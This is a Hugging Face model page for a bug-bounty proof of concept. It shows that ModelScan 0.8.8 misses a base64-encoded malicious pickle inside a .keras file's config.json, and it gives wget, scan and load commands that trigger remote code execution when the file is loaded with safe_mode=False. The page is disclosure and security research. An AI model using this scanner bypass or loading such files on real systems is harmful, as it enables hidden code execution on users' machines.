Instructions to use abdulb4s1t/modelscan-bypass-torch-rce-poc with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Keras
How to use abdulb4s1t/modelscan-bypass-torch-rce-poc with Keras:
# Available backend options are: "jax", "torch", "tensorflow". import os os.environ["KERAS_BACKEND"] = "jax" import keras model = keras.saving.load_model("hf://abdulb4s1t/modelscan-bypass-torch-rce-poc") - Notebooks
- Google Colab
- Kaggle
ModelScan v0.8.8 Scanner Bypass โ TorchModuleWrapper RCE PoC
PoC for Huntr Model Format Vulnerability bounty.
ModelScan v0.8.8 reports "No issues found" on this file despite it containing a malicious pickle that executes arbitrary code when loaded with safe_mode=False.
Reproduction
# 1. Download
wget https://huggingface.co/abdulb4s1t/modelscan-bypass-torch-rce-poc/resolve/main/exploit_final.keras
# 2. Install
pip install modelscan==0.8.8 keras torch
# 3. Scan -- reports clean
modelscan scan -p exploit_final.keras
# 4. Load -- triggers RCE during torch.load()
python -c "import keras; keras.saving.load_model('exploit_final.keras', safe_mode=False)"
Root Cause
ModelScan uses file extension as the sole scanner routing key:
- .keras -> KerasLambdaDetectScan (checks only for class_name == "Lambda")
- PickleUnsafeOpScan never runs on .keras files (wrong extension)
- Base64-encoded pickle in config.json is invisible to all 7 scanner modules
Environment
- ModelScan 0.8.8
- Keras 3.14.1 (v3.15.0-dev HEAD 4725b68 also tested -- no relevant differences)
- PyTorch 2.12.0+cpu
- Python 3.12.3
- Ubuntu 24.04 aarch64
Notes
- Requires safe_mode=False (non-default user opt-in)
- Gated access enabled -- request access or contact me
- Downloads last month
- 40
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support